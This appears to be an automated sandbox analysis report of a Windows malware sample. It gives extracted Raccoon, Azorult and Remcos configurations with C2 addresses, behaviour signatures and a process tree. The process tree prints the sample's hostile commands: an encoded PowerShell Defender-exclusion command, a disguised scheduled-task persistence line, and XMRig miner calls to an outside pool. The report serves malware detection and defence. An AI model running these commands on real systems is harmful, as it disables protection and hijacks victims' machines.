Analysis
-
max time kernel
1152s -
max time network
1035s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
23-01-2023 10:20
General
-
Target
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe
-
Size
831KB
-
MD5
f29f6dc54c33b2aae2950019ee54b04c
-
SHA1
c37d98a04edbe68fbd4e054fe0e96b1c926460ea
-
SHA256
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539
-
SHA512
3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c
-
SSDEEP
24576:Mf78hVkC6gGhgfyNbpiODGsSm+FGUz9q:MAhf6gGhgab6shWz
Score
10/10
Malware Config
Extracted
Family
raccoon
Botnet
75ea4cb7f040eb3056eaa4e86a3a9d6c
C2
http://91.215.85.146/
rc4.plain
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Extracted
Family
remcos
Botnet
1122023
C2
nikahuve.ac.ug:65214
kalskala.ac.ug:65214
tuekisaa.ac.ug:65214
parthaha.ac.ug:65214
Attributes
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
true
-
keylog_file
vgbvfxs.dat
-
keylog_flag
false
-
keylog_folder
fsscbas
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
fdsgsdmhj-9K01C1
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
notepad;solitaire;
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 24 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
-
Modifies Installed Components in the registry 2 TTPs 7 IoCs
-
Registers COM server for autorun 1 TTPs 26 IoCs
-
Sets file execution options in registry 2 TTPs 2 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 33 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks for any installed AV software in registry 1 TTPs 5 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 3 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Suspicious use of SetThreadContext 13 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 10 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 8 IoCs
-
Modifies data under HKEY_USERS 10 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 8 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: LoadsDriver 4 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 57 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 63 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe"C:\Users\Admin\AppData\Local\Temp\8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe"
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exeC:\Users\Admin\AppData\Local\Temp\8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\RZf3014g.exe"C:\Users\Admin\AppData\Roaming\RZf3014g.exe"
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\RZf3014g.exeC:\Users\Admin\AppData\Roaming\RZf3014g.exe
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "RZf3014g.exe"
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 3
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\tz2uN5WB.exe"C:\Users\Admin\AppData\Roaming\tz2uN5WB.exe"
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\tz2uN5WB.exeC:\Users\Admin\AppData\Roaming\tz2uN5WB.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 4BBSeeCcr5wHcnUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu6mcoH1fE9LC5.worker1 -p x --tls --algo rx/0 --cpu-max-threads-hint=50
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 4BBSeeCcr5wHcnUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu6mcoH1fE9LC5.worker1 -p x --tls --algo rx/0 --cpu-max-threads-hint=50
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 4BBSeeCcr5wHcnUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu6mcoH1fE9LC5.worker1 -p x --tls --algo rx/0 --cpu-max-threads-hint=50
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 4BBSeeCcr5wHcnUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu6mcoH1fE9LC5.worker1 -p x --tls --algo rx/0 --cpu-max-threads-hint=50
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\PugZ7yGn.exe"C:\Users\Admin\AppData\Roaming\PugZ7yGn.exe"
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\PugZ7yGn.exeC:\Users\Admin\AppData\Roaming\PugZ7yGn.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\qY46ApCL.exe"C:\Users\Admin\AppData\Roaming\qY46ApCL.exe"
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\qY46ApCL.exeC:\Users\Admin\AppData\Roaming\qY46ApCL.exe
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
- Creates scheduled task(s)
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /4
- Loads dropped DLL
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /4
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff92d9b4f50,0x7ff92d9b4f60,0x7ff92d9b4f70
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:2
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2024 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2312 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2960 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2904 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4496 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4624 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4760 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3032 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3188 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5220 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5584 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3788 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4796 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4524 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3140 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3416 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5044 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2632 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2624 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6124 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2180 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1564 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:1
-
